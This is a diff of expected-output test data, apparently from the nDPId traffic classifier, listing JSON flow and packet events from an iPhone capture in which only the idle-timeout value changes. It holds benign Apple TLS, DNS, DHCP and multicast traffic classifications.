-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600508,"flow_last_seen":1582454600508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454600508,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454600508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454600508,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAGXAqAIRX2UYNcWcAbsi3fgeAAAAALDC\/\/8YLgAAAgQFtAEDAwcBAQgKEd\/vhgAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454600541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454600541,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGS2lfZRg1wKgCEQG7xZzFmLU\/It34H6BScSB2MAAAAgQFrAQCCAqI0z6tEd\/vhgEDAwc="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454600545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAHHAqAIRX2UYNcWcAbsi3fgfxZi1QIAQBAsSJAAAAQEIChHf76yI0z6t"} -00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454600508,"flow_last_seen":1582454600545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454600508,"flow_last_seen":1582454600580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600580,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1582454598252,"flow_last_seen":1582454599058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12558,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1582454598587,"flow_last_seen":1582454600617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10875,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1582454598721,"flow_last_seen":1582454600748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":73228,"flow_avg_l4_payload_len":951,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454599225,"flow_last_seen":1582454600287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454599740,"flow_last_seen":1582454600279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7913,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600508,"flow_last_seen":1582454600508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454600508,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454600508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454600508,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAGXAqAIRX2UYNcWcAbsi3fgeAAAAALDC\/\/8YLgAAAgQFtAEDAwcBAQgKEd\/vhgAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454600541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454600541,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGS2lfZRg1wKgCEQG7xZzFmLU\/It34H6BScSB2MAAAAgQFrAQCCAqI0z6tEd\/vhgEDAwc="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454600545,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAHHAqAIRX2UYNcWcAbsi3fgfxZi1QIAQBAsSJAAAAQEIChHf76yI0z6t"} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454600508,"flow_last_seen":1582454600545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454600508,"flow_last_seen":1582454600580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600580,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1582454598252,"flow_last_seen":1582454599058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12558,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1582454598587,"flow_last_seen":1582454600617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10875,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1582454598721,"flow_last_seen":1582454600748,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":73228,"flow_avg_l4_payload_len":951,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454599225,"flow_last_seen":1582454600287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454599740,"flow_last_seen":1582454600279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7913,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} 
00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454553219,"flow_last_seen":1582454596366,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":2100,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454595839,"flow_last_seen":1582454599396,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454599396,"flow_last_seen":1582454600443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4485,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454599396,"flow_last_seen":1582454600443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4485,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} 
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1955,"flow_avg_l4_payload_len":488,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454598888,"flow_last_seen":1582454599079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454598888,"flow_last_seen":1582454599079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1582454598885,"flow_last_seen":1582454599226,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595352,"flow_last_seen":1582454596370,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 
